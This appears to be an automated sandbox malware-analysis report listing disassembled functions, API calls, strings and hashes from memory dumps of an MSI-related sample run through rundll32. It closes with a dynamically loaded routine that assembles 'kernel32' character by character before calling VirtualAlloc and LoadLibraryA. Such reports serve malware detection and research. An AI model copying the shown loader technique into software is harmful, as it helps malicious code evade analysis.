Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
String ID: 0123456789ABCDEFabcdef-+Xx
API String ID: 2544715827-2799312399
Opcode ID: bb5ccbcdff54d3032ae3f951833f129bf4ecb68cfa2cfed7b354bb773640ae35
Instruction ID: 719c534e39c04d6289e50a4a2b6d345217ffeb6cc111643483d51b46aa4d7080
Opcode Fuzzy Hash: bb5ccbcdff54d3032ae3f951833f129bf4ecb68cfa2cfed7b354bb773640ae35
Instruction Fuzzy Hash: 5BC19F34E042988FDF25DFA4C550BFCBBB2AF55700F2840A9E8956B283CB749E46DB51

Function 00CC62BE Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 316COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00CC62C8

Part of subcall function 00CC2D74: __EH_prolog3.LIBCMT ref: 00CC2D7B
Part of subcall function 00CC2D74: std::_Lockit::_Lockit.LIBCPMT ref: 00CC2D85
Part of subcall function 00CC2D74: std::_Lockit::~_Lockit.LIBCPMT ref: 00CC2DF6

_Find_elem.LIBCPMT ref: 00CC6502

Strings

0123456789ABCDEFabcdef-+Xx, xrefs: 00CC633F

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
String ID: 0123456789ABCDEFabcdef-+Xx
API String ID: 2544715827-2799312399
Opcode ID: 4d1492e005596907e8dd7736e91ffee12a3172a903f1d1fecdd92909159b6b7e
Instruction ID: da02484bc4d34526f38c3e0d4587eae9d64095cb9d94564fd9007cf46a14d93e
Opcode Fuzzy Hash: 4d1492e005596907e8dd7736e91ffee12a3172a903f1d1fecdd92909159b6b7e
Instruction Fuzzy Hash: 3CC1B370E042588FDF25DF68CA40FACBBB1BF51304F58809DE899AB286DB349D85DB50

Function 00CC6694 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 316COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00CC669E

Part of subcall function 00CBB8B0: std::_Lockit::_Lockit.LIBCPMT ref: 00CBB8DD
Part of subcall function 00CBB8B0: std::_Lockit::_Lockit.LIBCPMT ref: 00CBB900
Part of subcall function 00CBB8B0: std::_Lockit::~_Lockit.LIBCPMT ref: 00CBB928
Part of subcall function 00CBB8B0: std::_Lockit::~_Lockit.LIBCPMT ref: 00CBB9B7

_Find_elem.LIBCPMT ref: 00CC68D8

Strings

0123456789ABCDEFabcdef-+Xx, xrefs: 00CC6715

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
String ID: 0123456789ABCDEFabcdef-+Xx
API String ID: 3042121994-2799312399
Opcode ID: 0cfabe51a6641a4983860c50a01842826e1308d79282f7780144200834236233
Instruction ID: 2f90c5c3c3926fc0a6b9c1dcf85f84cbcf9e80d6b70dd4e7e369a91c4256f84f
Opcode Fuzzy Hash: 0cfabe51a6641a4983860c50a01842826e1308d79282f7780144200834236233
Instruction Fuzzy Hash: 7FC19130E042588FDF25DF64CA45BBCBBB2BF51304F54809DE899AB282DB348D85DB51

Function 00CE1A6D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMONLIBRARYCODE

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00CE1AFD

Strings

pow, xrefs: 00CE1AD5, 00CE1AF2

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 9b3eca963ba67b8a148d5ed9bec9326285791fa491d98788b2bac904b15c5cbc
Instruction ID: a1879d45c453574521b89f748f4cdaa2e191914c3c59de945e7b1f3d36489a48
Opcode Fuzzy Hash: 9b3eca963ba67b8a148d5ed9bec9326285791fa491d98788b2bac904b15c5cbc
Instruction Fuzzy Hash: 12516AB1A092C1DFCB117717C94137E77A4EB40700F384D69E8A6822B8EE35DDA5EA47

Function 00CD1E70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 182COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 00CD1FD1

Strings

-, xrefs: 00CD1FFF
0123456789abcdefghijklmnopqrstuvwxyz, xrefs: 00CD1F2F, 00CD1F66, 00CD1F6B

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: __aulldiv
String ID: -$0123456789abcdefghijklmnopqrstuvwxyz
API String ID: 3732870572-1956417402
Opcode ID: f0bebe9ea1c30f0bc224aca71f160def5e39823dfa7d54964668b9d6bb31373a
Instruction ID: 2afee61f70679f83e159cb25ab352190fc271d8a0d7e9099a1d055693cc27ddf
Opcode Fuzzy Hash: f0bebe9ea1c30f0bc224aca71f160def5e39823dfa7d54964668b9d6bb31373a
Instruction Fuzzy Hash: 3F51C170B04289AFDF258FA984857BEBBF5AF46350F18445BEEA1D7341C3709A41CB61

Function 00CBBD90 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 167COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00CBBF6E

Strings

true, xrefs: 00CBBEAB
false, xrefs: 00CBBE95

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: Concurrency::cancel_current_task
String ID: false$true
API String ID: 118556049-2658103896
Opcode ID: 1fa96d2b6a103b00e3f4a0f7f5e3652d0fa503202ca707c1692c3b0f6352dad9
Instruction ID: b3f5a563843e7868ecbc653ff850c0dcaf4551528f6a71e45165f11559ee2972
Opcode Fuzzy Hash: 1fa96d2b6a103b00e3f4a0f7f5e3652d0fa503202ca707c1692c3b0f6352dad9
Instruction Fuzzy Hash: 4A51C5B5D007489FDB10DFA4C841BEEB7B8FF05304F14426AE945AB281E774EA45CB91

Function 00CB70A0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 149COMMON

Download Yara Rule

Strings

\\?\, xrefs: 00CB71E3, 00CB7210
\\?\UNC\, xrefs: 00CB7173, 00CB71CE

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID:
String ID: \\?\$\\?\UNC\
API String ID: 0-3019864461
Opcode ID: db4c4585fe00613e6669fe6ef0ade9fd6f7ac980a90c8f7985553981d36607c4
Instruction ID: 59cf29431796aedee42b469c984e2f5eb49df586569b644e32ed7d380483d35c
Opcode Fuzzy Hash: db4c4585fe00613e6669fe6ef0ade9fd6f7ac980a90c8f7985553981d36607c4
Instruction Fuzzy Hash: 9451C170A14204DBDF14DF68C945BEEB7B5FF84304F14461DE806A7281DBB5A989CBA0

Function 00CCD4FA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 130COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00CCD501
_swprintf.LIBCMT ref: 00CCD573

Part of subcall function 00CC254E: __EH_prolog3.LIBCMT ref: 00CC2555
Part of subcall function 00CC254E: std::_Lockit::_Lockit.LIBCPMT ref: 00CC255F
Part of subcall function 00CC254E: std::_Lockit::~_Lockit.LIBCPMT ref: 00CC25D0

Part of subcall function 00CC2FC8: __EH_prolog3.LIBCMT ref: 00CC2FCF

Strings

%.0Lf, xrefs: 00CCD56B

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: H_prolog3Lockitstd::_$H_prolog3_Lockit::_Lockit::~__swprintf
String ID: %.0Lf
API String ID: 3050236999-1402515088
Opcode ID: 838135bac0405fedf90c3f113e93a4293609cae380f2a2dd770530f93e9fc74f
Instruction ID: b6b2f06cea9223a3084414b09374ccc6dce29d89532963cc0c399289c38fe901
Opcode Fuzzy Hash: 838135bac0405fedf90c3f113e93a4293609cae380f2a2dd770530f93e9fc74f
Instruction Fuzzy Hash: E44159B1E00208ABCF05EFE4C885BED7BB5FF08304F208559E946AB295DB359916DF91

Function 00CCD79E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 130COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00CCD7A5
_swprintf.LIBCMT ref: 00CCD817

Part of subcall function 00CB8610: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8657
Part of subcall function 00CB8610: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8679
Part of subcall function 00CB8610: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB86A1
Part of subcall function 00CB8610: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB880E

Strings

%.0Lf, xrefs: 00CCD80F

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
String ID: %.0Lf
API String ID: 1487807907-1402515088
Opcode ID: 86aa5df50144222f7e45b95c10af61e1d778be2502ed9291d38268d76289bdee
Instruction ID: 5cdcbd18955d1c3feac9e25c234e6e59f84dec5cc834956a48b0df45e9fc5ac9
Opcode Fuzzy Hash: 86aa5df50144222f7e45b95c10af61e1d778be2502ed9291d38268d76289bdee
Instruction Fuzzy Hash: 4F418A71E00208ABCF05EFE0D845AEE7BB5FF08300F204459E946AB295EB35A916DF90

Function 00CD1887 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 128COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00CD188E
_swprintf.LIBCMT ref: 00CD1900

Part of subcall function 00CB9270: std::_Lockit::_Lockit.LIBCPMT ref: 00CB92A0
Part of subcall function 00CB9270: std::_Lockit::_Lockit.LIBCPMT ref: 00CB92C2
Part of subcall function 00CB9270: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB92EA
Part of subcall function 00CB9270: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB9422

Strings

%.0Lf, xrefs: 00CD18F8

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
String ID: %.0Lf
API String ID: 1487807907-1402515088
Opcode ID: 0fecfefd55418e1d4cf9afdfa8aa8d6dc67c3bb9804bacc7bcb04ab7ecaf6a86
Instruction ID: a841633a4ed76e7063ba0f6b61e3175ea52944e2f45fae3368ed38a237d04bee
Opcode Fuzzy Hash: 0fecfefd55418e1d4cf9afdfa8aa8d6dc67c3bb9804bacc7bcb04ab7ecaf6a86
Instruction Fuzzy Hash: 6C416771E00209ABCF05DFE4DC54AEDBBB5FB08300F20854AE906AB395DB359A15DF91

Function 00CD6059 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00CD607E

Strings

MOC, xrefs: 00CD6090
RCC, xrefs: 00CD6098

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: e1b68926feef361b66466fd0b301e3b3905623b002b582b32a7450ada91057f2
Instruction ID: a0612dd07518293887acd1f4d97e39bf2742636a90eab8da89625c9114f9b47e
Opcode Fuzzy Hash: e1b68926feef361b66466fd0b301e3b3905623b002b582b32a7450ada91057f2
Instruction Fuzzy Hash: 7E414871900209EFCF15DF98CC81AEEBBB5FF48304F19815AFA1867252D335AA51DB51

Function 00CCDF8F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00CCDF96
__cftoe.LIBCMT ref: 00CCE01A

Strings

!%x, xrefs: 00CCDFA7

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: H_prolog3___cftoe
String ID: !%x
API String ID: 855520168-1893981228
Opcode ID: d4bf05f8df52fc54a7c85b0ee13281381cf922fef9c377c1736546f8d1a53044
Instruction ID: 827eb126d7f1ad8bdfa6719688ab59d547ce09ab0a509e769ca59612feedd9ca
Opcode Fuzzy Hash: d4bf05f8df52fc54a7c85b0ee13281381cf922fef9c377c1736546f8d1a53044
Instruction Fuzzy Hash: 21314771D01209ABDF04DF94E881BEEB7B6FF08304F20442DF905A7251DB75AA46DBA4

Function 00CD19FA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00CD1A01
__cftoe.LIBCMT ref: 00CD1A7F

Strings

!%x, xrefs: 00CD1A15

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: H_prolog3___cftoe
String ID: !%x
API String ID: 855520168-1893981228
Opcode ID: 7f5d4dd728eff8d543ed592f115bf16ff6581395e3deb7734c0048320bb1d197
Instruction ID: 44a08248ab5f9e00c45e82fdfee33099be85165c3f26d9684a639b5644c65868
Opcode Fuzzy Hash: 7f5d4dd728eff8d543ed592f115bf16ff6581395e3deb7734c0048320bb1d197
Instruction Fuzzy Hash: 74317C71D15249AFDF00DF94D881BEEBBB5EF05300F14001AF948A7342D7759A46EBA0

Function 00CB5F40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

ConvertSidToStringSidW.ADVAPI32(?,00000000), ref: 00CB5F86
LocalFree.KERNEL32(00000000,Invalid SID,0000000B,?,00000000,665E9022), ref: 00CB5FF6

Strings

Invalid SID, xrefs: 00CB5FD4

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: ConvertFreeLocalString
String ID: Invalid SID
API String ID: 3201929900-130637731
Opcode ID: 71ed5a01aa0a73256a6e627aa46a51405c2aafa0d1036c7b98981a8cbff2b0e7
Instruction ID: 774a1212a5645bf9cade7898060b6260da25bc43dd0a7f7568e5fcd2a210f9ba
Opcode Fuzzy Hash: 71ed5a01aa0a73256a6e627aa46a51405c2aafa0d1036c7b98981a8cbff2b0e7
Instruction Fuzzy Hash: B7218C75A046099BDB14DF98C815BBFBBF8EF44714F100A1DE815A7780D7BA6A04CBD0

Function 00CB9070 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00CB909B
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00CB90FE

Strings

bad locale name, xrefs: 00CB9121

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 3988782225-1405518554
Opcode ID: 8ef2e98109272d310d4176029871e82c12f548206c531d39988d0b453758f091
Instruction ID: 5b10fd9a91184df4a47b17e76da9804b310617b1f5618550cdd6ed5482dad2c7
Opcode Fuzzy Hash: 8ef2e98109272d310d4176029871e82c12f548206c531d39988d0b453758f091
Instruction Fuzzy Hash: DB21D270805B84DED721CFA8C904B8BBFF4EF19710F10869DE49997781D3B5A604CBA1

Function 00CBF098 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00CBF09F

Strings

true, xrefs: 00CBF109
false, xrefs: 00CBF0F6

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: H_prolog3_
String ID: false$true
API String ID: 2427045233-2658103896
Opcode ID: 993b45d57090ecf43b7d93a7052c7bb4e3f5a00e932e36b200384256bc28531b
Instruction ID: 91c3e276a1b4eb238aa9215e83cc01dd6841388b53683fcac10a6ae5da49d80b
Opcode Fuzzy Hash: 993b45d57090ecf43b7d93a7052c7bb4e3f5a00e932e36b200384256bc28531b
Instruction Fuzzy Hash: 27119375941744AEC720EFB4D881BCAB7F4AF05300F14C51AE9A5C7392EB70E605DB61

Function 00CB4070 Relevance: 5.2, APIs: 4, Instructions: 189memoryCOMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(00000000,00CB4261,00CF4400,000000FF,665E9022,00000000,?,00000000,?,?,?,00CF4400,000000FF,?,00CB3A75,?), ref: 00CB4096
LocalAlloc.KERNEL32(00000040,40000022,665E9022,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00CB4154
LocalAlloc.KERNEL32(00000040,3FFFFFFF,665E9022,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00CB4177
LocalFree.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00CB4217

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: Local$AllocFree
String ID:
API String ID: 2012307162-0
Opcode ID: 9c2ccdc9730f2d057dc6f7cb50691e6640b573b2b74d4ea7c660118b7906a80e
Instruction ID: 1ac58b1901ffe8c208290b375fe4657fe15cea708c6a4154899b3e6dec30e054
Opcode Fuzzy Hash: 9c2ccdc9730f2d057dc6f7cb50691e6640b573b2b74d4ea7c660118b7906a80e
Instruction Fuzzy Hash: 945190B1A042059FDB18DF6CC985AAEBBB5FB48350F14462DE925E7381D731AE40CB91

Function 00CB1D80 Relevance: 5.2, APIs: 4, Instructions: 171memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,80000022,00000000,?,00000000), ref: 00CB1E01
LocalAlloc.KERNEL32(00000040,7FFFFFFF,00000000,?,00000000), ref: 00CB1E21
LocalFree.KERNEL32(7FFFFFFE,?,00000000), ref: 00CB1EA7
LocalFree.KERNEL32(00000001,665E9022,00000000,00000000,00CF3C40,000000FF,?,00000000), ref: 00CB1F2D

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: Local$AllocFree
String ID:
API String ID: 2012307162-0
Opcode ID: 0b5a035d4124dc8e50e51233325b3ae070b41f62a61f6b8bf98a5025210ea71d
Instruction ID: d949e597c7ac78868cce0ed2d64f6bce8764c0b0b29585afedc68c8944be1f0d
Opcode Fuzzy Hash: 0b5a035d4124dc8e50e51233325b3ae070b41f62a61f6b8bf98a5025210ea71d
Instruction Fuzzy Hash: C751C0726042159FC715DF28D884AAAB7E8FB49360F550B2EFD66D7290DB30EA04C791

Analysis Process: rundll32.exePID: 7192, Parent PID: 7176COMMON

Execution Graph

Execution Coverage:	1.9%
Dynamic/Decrypted Code Coverage:	99.6%
Signature Coverage:	7.2%
Total number of Nodes:	1117
Total number of Limit Nodes:	21

Executed Functions

Function 000001E519090024 Relevance: 14.5, APIs: 2, Strings: 6, Instructions: 484
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32 ref: 000001E519090186
LoadLibraryA.KERNEL32 ref: 000001E51909034B

Strings

k, xrefs: 000001E519090054
r, xrefs: 000001E51909005B
e, xrefs: 000001E519090066
., xrefs: 000001E519090074
3, xrefs: 000001E51909006D
l, xrefs: 000001E51909007B

Memory Dump Source

Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false

Joe Sandbox IDA Plugin

